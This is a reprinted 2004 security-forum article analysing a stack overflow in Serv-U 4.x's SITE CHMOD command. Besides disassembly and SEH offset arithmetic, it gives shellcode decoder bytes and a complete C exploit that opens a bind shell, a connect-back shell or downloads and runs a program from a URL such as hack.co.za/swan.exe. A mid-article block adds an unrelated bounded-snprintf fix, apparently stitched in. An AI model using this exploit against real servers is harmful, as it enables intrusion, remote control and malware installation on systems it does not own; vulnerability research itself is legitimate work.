[Hands-on] Serv-U "Site Chmod XXX" Exploit


Serv-U "Site Chmod XXX" EXPLOIT

Creation time: 2004-02-20

Article type: reprint

Submitted by: Velvet (ZodiacSoft_AT_HOTMAIL.COM)

Forum login name: Swan

Submitter's email address: ????

Submitter's QQ number: ????

Copyright: this article is jointly owned by China Safety Net (Http://www.safechina.net) and the author; please credit the source when reposting!

Title: Serv-U "Site Chmod XXX" EXPLOIT

Content:

KKQQ discovered that in Serv-U 4.x and earlier, a stack overflow occurs when a long file name is passed to SITE CHMOD.

Let's look at the analysis briefly. First, use IDA to look at the problematic spot:

.text:004194EB loc_4194EB:                    ; CODE XREF: sub_419080+457j
.text:004194EB     push    [ebp+var_8]
.text:004194EE     push    0FFFFFFFh
.text:004194F0     push    4B4h
.text:004194F5     lea     eax, [esi+8488h]
.text:004194FB     push    eax
.text:004194FC     call    sub_414344
.text:00419501     add     esp, 0Ch
.text:00419504     push    eax                ; "550 %s: No such file or directory."
.text:00419505     lea     edx, [ebp+buffer]
.text:0041950B     push    edx
.text:0041950C     call    _sprintf           ; <== here
.text:00419511     add     esp, 0Ch
.text:00419514     lea     ecx, [ebp+buffer]
.text:0041951A     push    ecx
.text:0041951B     push    esi
.text:0041951C     call    sub_433608
.text:00419521     add     esp, 8
.text:00419524     dec     [ebp+var_38]
.text:00419527     dec     [ebp+var_38]
.text:0041952A     cmp     [ebp+var_8], 0
.text:0041952E     jz      loc_4195BD
.text:00419534     mov     eax, [ebp+var_8]
.text:00419537     mov     edx, [eax-0Ch]

When a file that does not exist is submitted, Serv-U replies that the file was not found. The buffer that holds the error message is only 0x1ec bytes (?), while the actual file name can be longer than 0x500 bytes, so sprintf writes far past the end of it.
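Added example, not code from the original article or from Serv-U: the defect the listing shows is a fixed-size reply buffer (0x1ec bytes at ebp-0x1ec) filled by an unbounded sprintf with a caller-controlled path. The functions below compute when that reply overflows and show the bounded form of the same reply. The format string and the 0x1ec size come from the listing; treating the 0x4b4 pushed before sub_414344 as the path buffer size, the function names and the sample paths are my assumptions.

```c
#include <stdio.h>
#include <string.h>
#include <stdbool.h>

/* Sizes read off the disassembly above: the reply is built in a stack buffer at
 * ebp-0x1ec, and the path was read with a 0x4b4-byte limit (assumed here to be
 * the path buffer size). Anything the path can hold beyond what the reply
 * buffer fits walks over var_38, var_8 and the SEH record. */
#define REPLY_BUF_SIZE 0x1ec
#define PATH_MAX_LEN   0x4b4
static const char NOT_FOUND_FMT[]  = "550 %s: No such file or directory.";
static const char TOO_LONG_REPLY[] = "550 Path name too long.";

/* Bytes the formatted reply needs, excluding the terminating NUL;
 * strlen(fmt) - 2 drops the "%s" that the path replaces. */
size_t reply_len_needed(const char *path)
{
    return strlen(NOT_FOUND_FMT) - 2 + strlen(path);
}

/* The unbounded sprintf in Serv-U overflows exactly when this is true. */
bool reply_would_overflow(const char *path)
{
    return reply_len_needed(path) + 1 > REPLY_BUF_SIZE;
}

/* Hardened formatter: snprintf never writes past outsz, and an over-long path
 * gets a fixed error reply instead of a silently truncated one.
 * Returns the reply length, or -1 when the path was rejected. */
int format_not_found(char *out, size_t outsz, const char *path)
{
    if (strlen(path) > PATH_MAX_LEN || reply_len_needed(path) + 1 > outsz) {
        snprintf(out, outsz, "%s", TOO_LONG_REPLY);
        return -1;
    }
    int n = snprintf(out, outsz, NOT_FOUND_FMT, path);
    if (n < 0 || (size_t)n >= outsz) {      /* cannot happen after the check above */
        snprintf(out, outsz, "%s", TOO_LONG_REPLY);
        return -1;
    }
    return n;
}

/* Stand-alone run on constructed inputs: a normal path and a 0x500-byte one
 * (the article's "more than 0x500" case). */
int main(void)
{
    char reply[REPLY_BUF_SIZE];
    char longpath[0x500 + 1];
    memset(longpath, 'A', 0x500);
    longpath[0x500] = '\0';

    printf("short: need %zu, overflow=%d, rc=%d\n",
           reply_len_needed("/upload/foo.txt"), reply_would_overflow("/upload/foo.txt"),
           format_not_found(reply, sizeof reply, "/upload/foo.txt"));
    printf("long:  need %zu, overflow=%d, rc=%d -> %s\n",
           reply_len_needed(longpath), reply_would_overflow(longpath),
           format_not_found(reply, sizeof reply, longpath), reply);
    return 0;
}
```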

This is mainly about exploitation; friends who are interested can analyze it slowly, and I guess nobody wants to hear me ramble. Tracing back from here, you naturally find the place where the command is parsed and handled.

When a long file name is submitted, a memory access exception generally occurs at .text:00419537 mov edx, [eax-0Ch], because [ebp+var_8] has been overwritten. So overwriting the SEH handler address should make this vulnerability easy to use. Let's first use OllyDbg to look at the situation when the exception occurs.

ebp-58 > 77E3929C  USER32.77E3929C
ebp-54 > 06EB06EB  pointer to next SEH record
ebp-50 > 77E3929C  SE handler           <= needs to be overwritten carefully
ebp-4C > 06EB06EB
ebp-48 > 77E3929C  USER32.77E3929C
...
buffer:
ebp-1EC > 20303535  ("550 ")

Let's calculate. Because the file name starts from the FTP root and the preceding "550 " is added, the buffer must begin with "550 /", which is 5 bytes; submitting that seems simple enough. So 0x1ec - 0x50 - 0x5 = 0x197 = 407 bytes into the submitted name is where the SEH handler is actually overwritten.

In practice we may have no write permission on the root directory. After a CWD to a writable directory, the buffer holding the error message becomes "550 /xxx/", so we should record the length of the directory name when changing directory; the actual overwrite position is then 407 - npathlen. Naturally, 403 - npathlen should hold NOP / NOP / JMP 4, and the shellcode starts at 411 - npathlen.

Before the memory access exception there are two dec [ebp+var_38] instructions that we have to watch, because they modify our shellcode; the character at 425 - npathlen has to compensate for them.

Because of the FTP protocol itself and the way the submitted data is handled, characters such as ",", "?", "/", ":", 0xff and 0x0a cannot appear in the data we submit, so existing shellcode does not meet the requirements and has to be rewritten slightly.

The problem is usually that the decoder at the front of the shellcode contains illegal characters, and when we get control the address is determined by EBX (we originally jmp ebx). So either compute the real shellcode address directly and start decoding there, or start searching from EBX; I took the latter approach. The rewritten decoding part is as follows. Because of debugging, many of the 0x90s were 0xcc at the time and I never changed them back :-)

"\x90\x8b\xc3\xbb\x51\x50\x50\x50\x4b\x40\x39\x18\x75\xfb\x40\x40"
"\x40\x33\xc9\x90\x90\x66\xb9\x7d\x01\x80\x34\x08\x99\xe2\xfa\x90"
"\x50\x50\x50\x50"

90              nop
8B C3           mov  eax, ebx
BB 51 50 50 50  mov  ebx, 50505051h
4B              dec  ebx
40              inc  eax
39 18           cmp  dword ptr [eax], ebx
75 FB           jne  -5                 ; back to inc eax
40              inc  eax
40              inc  eax
40              inc  eax
33 C9           xor  ecx, ecx
90              nop
90              nop                     ; remember to add 2 here, making it 0x92
66 B9 7D 01     mov  cx, 17Dh           ; decoded length, 17D is enough
80 34 08 99     xor  byte ptr [eax+ecx], 99h
E2 FA           loop -6                 ; back to the xor
90              nop
50              push eax                ; _emit 50h
50              push eax
50              push eax
50              push eax

That is, 0x50505050 is used as a marker (it is itself executable: push eax). The dec ebx keeps the search from matching the immediate inside the decoder itself; then it searches for the real encoded shellcode and finally decodes starting from EAX (the original EBX). Because the 21st byte is decremented twice, it has to be compensated. The final processed BIND53 shellcode looks like this, with the original head removed and replaced by the one described above:

"\x90\x8b\xc3\xbb\x51\x50\x50\x50\x4b\x40\x39\x18\x75\xfb\x40\x40"
"\x40\x33\xc9\x90\x92"                          // 92? yes, 0x92! two NOPs for fun
//.text:00419524 dec [ebp+var_38]
//.text:00419527 dec [ebp+var_38]
"\x66\xb9\x7d\x01"
"\x80\x34\x08\x99\xe2\xfa\x90\x50\x50\x50\x50"  // bind port 53, lion's shellcode
"\x70\x99\xc3\xfd\x38\xa9\x99\x99\x99\x12\xd9\x95\x12"
...

It can be improved a little further. After streamlining, it became this:

// search from ebx and decode
"\xbe\x0c\x99\xe2\xfa\x4e\x43\x39\x33\x75\xfb\x83\xc3\x03\x33\xc9"
"\x66\xb9\x80\x01\x80\x34\x0b\x99\xe2\xfa"

    mov  esi, 0FAE2990Ch
    dec  esi
findsc_loop:
    inc  ebx
    cmp  dword ptr [ebx], esi
    jne  findsc_loop
    add  ebx, 3
    xor  ecx, ecx
    mov  cx, 180h
decode_loop:
    xor  byte ptr [ebx+ecx], 99h
    loop decode_loop

Of course, directly computing the start address of the real shellcode is more general. Assume the layout is as follows:

-----+-------------+---------------+--------+-------------------
AA...| 90 90 JMP 4 | RET (JMP EBX) | Decode | Encoded shellcode
-----+-------------+---------------+--------+-------------------
     ^
     EBX

When Decode gets control, EBX points to the first 0x90, so EBX + 8 + (length of Decode) is the first address of the encoded shellcode. First write a decode framework, then the EBX adjustment can be determined:

    add  ebx, 5          ; <== this value is to be determined
    xor  ecx, ecx
    mov  cx, 180h
decode_loop:
    xor  byte ptr [ebx+ecx], 99h
    loop decode_loop

Counting the length, it is 15 bytes, so EBX should add 8 + 15 = 23 = 0x17. But in fact LOOP decrements ECX before testing it and never runs the XOR with ECX = 0, so [EBX+ECX] never touches EBX itself; EBX should therefore add 0x16 instead. Fill 0x16 in and the final result is:

"\x83\xc3\x16\xb9\x83\x01\x80\x34\x0b\x99\xe2\xfa"

Fifteen bytes of decoder, heh, the shortest ~

If it is the Download & Exec shellcode it is a little more troublesome, because ':' cannot appear. I don't want to type any more; see how the xploit handles it. I really don't like typing: writing the xploit took 2 hours and typing this up took just as long...

In the following xploit the timeout is set to 1 second. Generally speaking, if it stalls for a second after the change dir and then returns, you have really succeeded. If it returns "success" immediately, the overwrite address must be wrong and Serv-U has hung. The JMP EBX is at 0x7ffa4a1b, which works for CN/EN Win2k; try it yourself and change it if needed. The program is not well written, some of the checks are simply taken for granted, so it may well report false positives; you can also remove all the if (buff[0] != '2') checks and assume every step succeeded, and you can set the timeout (the default is one second). I have had good results on Serv-U 4.1.0.3/4.1.0.2/4.0.3/4.1.0.2/4.0.3.3.0.0.0.0.0.0.

/*
Kkqq found that when connecting to a FTP server using Serv-U (v4.x and below),
the operation "Site Chmod 755 " will cause a stack-based overflow.
This is only exploitable when you have the write privilege.

Er, IDA told me that:

.text:004194EB loc_4194EB:                    ; CODE XREF: sub_419080+457j
.text:004194EB     push    [ebp+var_8]        ; points to the file name
.text:004194EE     push    0FFFFFFFh
.text:004194F0     push    4B4h
.text:004194F5     lea     eax, [esi+8488h]
.text:004194FB     push    eax
.text:004194FC     call    sub_414344
.text:00419501     add     esp, 0Ch
.text:00419504     push    eax                ; format = "550 %s: No such file or directory."
.text:00419505     lea     edx, [ebp+buffer]
.text:0041950B     push    edx
.text:0041950C     call    _sprintf           ; <============== ^_^
.text:00419511     add     esp, 0Ch
.text:00419514     lea     ecx, [ebp+buffer]
.text:0041951A     push    ecx
.text:0041951B     push    esi
.text:0041951C     call    sub_433608
.text:00419521     add     esp, 8
.text:00419524     dec     [ebp+var_38]       ; this is why 0x92 appears
.text:00419527     dec     [ebp+var_38]
.text:0041952A     cmp     [ebp+var_8], 0
.text:0041952E     jz      loc_4195BD
.text:00419534     mov     eax, [ebp+var_8]   ; <== attention
.text:00419537     mov     edx, [eax-0Ch]     ; <== my ollydbg stopped here and @#$!@# then
                                              ;     shellcode ran ^_^. Choosing a value (address)
                                              ;     that could be read for eax would lead another way
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32")

void help(char *program)
{
    printf("=========================================================\r\n");
    printf("Serv-U \"Site Chmod XXX LongFileName\" xploit v0.20 alpha\r\n");
    printf("Originally discovered by kkqq@ustc - thank you~ (*^_^*)\r\n");
    printf("For Serv-U 4.x with win2k, written by swan@seu\r\n");
    printf("=========================================================\r\n\r\n");
    // argument names follow the argv handling in main()
    printf("USAGE: %s <host> <port> <user> <pass> <writable dir>\r\n", program);
    printf("       %s <host> <port> <user> <pass> <writable dir> <url>\r\n", program);
    printf("       %s <host> <port> <user> <pass> <writable dir> <ip> <port>\r\n", program);
    printf("e.g.:\r\n");
    printf("(1) you have write privilege at /upload/\r\n");
    printf("%s 127.0.0.1 21 test test upload http://hack.co.za/swan.exe\r\n", program);
    printf("(2) you have write privilege at root\r\n");
    printf("%s 127.0.0.1 21 test test / 202.119.9.42 8111\r\n", program);
    printf("\r\nThis is an overwrite-seh-and-call-ebx version (jmp ebx at 0x7ffa4a1b),\r\n");
    printf("choose a mode you like to open port 53, connect back or download & exec.\r\n");
    printf("For XP/2k3, you may try to exploit this in another way...\r\n");
    return;
}

unsigned char bpsc[] =
    // "decoding" code should not contain \xff\xff\xff nor \x0a nor ':' ...
    // so search from ebx to find the head of the encoded shellcode
    "\x90\x8b\xc3\xbb\x51\x50\x50\x50\x4b\x40\x39\x18\x75\xfb\x40\x40"
    "\x40\x33\xc9\x90\x92"                          // 92? yes, 0x92! two NOPs for fun
    //.text:00419524 dec [ebp+var_38]
    //.text:00419527 dec [ebp+var_38]
    "\x66\xb9\x7d\x01"
    "\x80\x34\x08\x99\xe2\xfa\x90\x50\x50\x50\x50"
    // bind port 53: encoded payload (port xor 0x9999, default is 53) omitted
    ;

#define ip_offset   249
#define port_offset 244

unsigned char cbsc[] =
    // search from ebx and decode
    "\xbe\x0c\x99\xe2\xfa\x4e\x43\x39\x33\x75\xfb\x83\xc3\x03\x33\xc9"
    "\x66\xb9\x80\x01\x80\x34\x0b\x99\xe2\xfa"
    // connect back, from http://www.xfocus.net/articles/200307/574.html
    // (encoded payload omitted; ip_offset and port_offset index into it)
    ;

unsigned char dehead[] =
    "\x90\x8b\xc3\xbb\x51\x50\x50\x50\x4b\x40\x39\x18\x75\xfb\x40\x40"
    "\x40\x92\x66\xb9\xf0\x01\x80\x34\x08\x99\xe2\xfa\x90"
    "\x50\x50\x50\x50"
    // download & execute, modified slightly... (encoded payload omitted)
    ;
    // the URL is appended at run time, e.g.
    // "http://127.0.0.1/hello.exe"
    // "\x80";

unsigned char desc[500] = {0};

void main(int argc, char *argv[])
{
    WSADATA wsadata;
    SOCKET s;
    struct hostent *he;
    struct sockaddr_in host;
    int ntimeout = 1000;

    if (argc != 6 && argc != 7 && argc != 8)
    {
        help(argv[0]);
        return;
    }

    if (argc == 7)
    {
        // initialize the download & execute shellcode
        // shellcode head + ((URL + 0x80) xor 0x99)  <== all for the damned ':' and '/'
        memset(desc, 0, 500);
        memcpy(desc, dehead, sizeof(dehead));
        char url[255];
        strcpy(url, argv[6]);
        strcat((char *)url, "\x80");
        for (unsigned int j = 0; j < strlen(url); j++)
            url[j] = url[j] ^ '\x99';
        strcat((char *)desc, url);
    }

    if (argc == 8)
    {
        unsigned short port = htons(atoi(argv[7])) ^ (u_short)0x9999;
        unsigned long ip = inet_addr(argv[6]) ^ 0x99999999;
        memcpy(&cbsc[port_offset], &port, 2);
        memcpy(&cbsc[ip_offset], &ip, 4);
    }

    if (WSAStartup(0x0101, &wsadata) != 0)
    {
        printf("Error starting winsock..");
        return;
    }

    if ((he = gethostbyname(argv[1])) == 0)
    {
        printf("Failed resolving '%s'", argv[1]);
        return;
    }

    host.sin_port = htons(atoi(argv[2]));
    host.sin_family = AF_INET;
    host.sin_addr = *((struct in_addr *)he->h_addr);

    if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1)
    {
        printf("Failed creating socket");
        return;
    }

    if ((connect(s, (struct sockaddr *)&host, sizeof(host))) == -1) {
        printf("Failed connecting to host\r\n");
        return;
    }

    setsockopt(s, SOL_SOCKET, SO_RCVTIMEO, (char *)&ntimeout, sizeof(ntimeout));

    char buff[50000] = {0};
    memset(buff, 0, sizeof(buff));

    char szuser[255] = {0};
    strcpy(szuser, "USER ");
    strcat(szuser, argv[3]);
    strcat(szuser, "\r\n");

    char szpass[255] = {0};
    strcpy(szpass, "PASS ");
    strcat(szpass, argv[4]);
    strcat(szpass, "\r\n");

    int bread = recv(s, buff, sizeof(buff), 0);
    if (bread == -1)
    {
        closesocket(s);
        printf("No response... perhaps it has been hacked!\r\n");
        return;
    }
    printf(buff);

    // send user
    send(s, szuser, strlen(szuser), 0);
    memset(buff, 0, sizeof(buff));
    recv(s, buff, sizeof(buff), 0);
    printf(buff);

    // send pass
    send(s, szpass, strlen(szpass), 0);
    memset(buff, 0, sizeof(buff));
    recv(s, buff, sizeof(buff), 0);
    printf(buff);

    if (buff[0] != '2')
    {
        closesocket(s);
        printf("Authentication failed!\r\n");
        return;
    }

    // change dir
    char szchangedir[255] = {0};
    strcpy(szchangedir, "CWD /");
    strcat(szchangedir, argv[5]);
    strcat(szchangedir, "\r\n");
    send(s, szchangedir, strlen(szchangedir), 0);
    memset(buff, 0, sizeof(buff));
    recv(s, buff, sizeof(buff), 0);
    printf(buff);

    if (buff[0] != '2')
    {
        closesocket(s);
        printf("Error changing path!\r\n");
        return;
    }

    int npathlen = strlen(argv[5]) + 1;
    if (argv[5][npathlen - 2] == '/')
        npathlen--;
    if (npathlen == 1)
        npathlen--;

    char xploit[1500] = {0};
    char head[] = "SITE CHMOD 755 ";
    char evil[1000] = {0};
    memset(xploit, 0, sizeof(xploit));

    for (int i = 0; i < 403; i++)
        evil[i] = '\x90';
    *(int *)(evil + 403 - npathlen) = 0x04eb9090;   // NOP NOP JMP 4
    *(int *)(evil + 407 - npathlen) = 0x7ffa4a1b;   // JMP EBX

    if (argc == 6)
        memcpy(evil + 411 - npathlen, bpsc, sizeof(bpsc));
    if (argc == 7)
        memcpy(evil + 411 - npathlen, desc, strlen((char *)desc));
    if (argc == 8)
        memcpy(evil + 411 - npathlen, cbsc, sizeof(cbsc));

    strcpy(xploit, head);
    strcat(xploit, evil);
    strcat(xploit, "\r\n");
    send(s, xploit, strlen(xploit), 0);
    memset(buff, 0, sizeof(buff));
    bread = recv(s, buff, sizeof(buff), 0);

    if (bread == -1)
    {
        closesocket(s);
        if (argc == 6)
            printf("Success! Try connecting to port 53 to get your shell...\r\n");
        if (argc == 7)
            printf("Success! The host has downloaded and executed the program...\r\n");
        if (argc == 8)
            printf("Success! See your nc.exe...\r\n");
        return;
    }

    printf("Failed... perhaps it has been patched, or you don't have the write privilege!\r\n");
    closesocket(s);
    return;
}

Please credit the original address when reposting: https://www.9cbs.com/read-41012.html
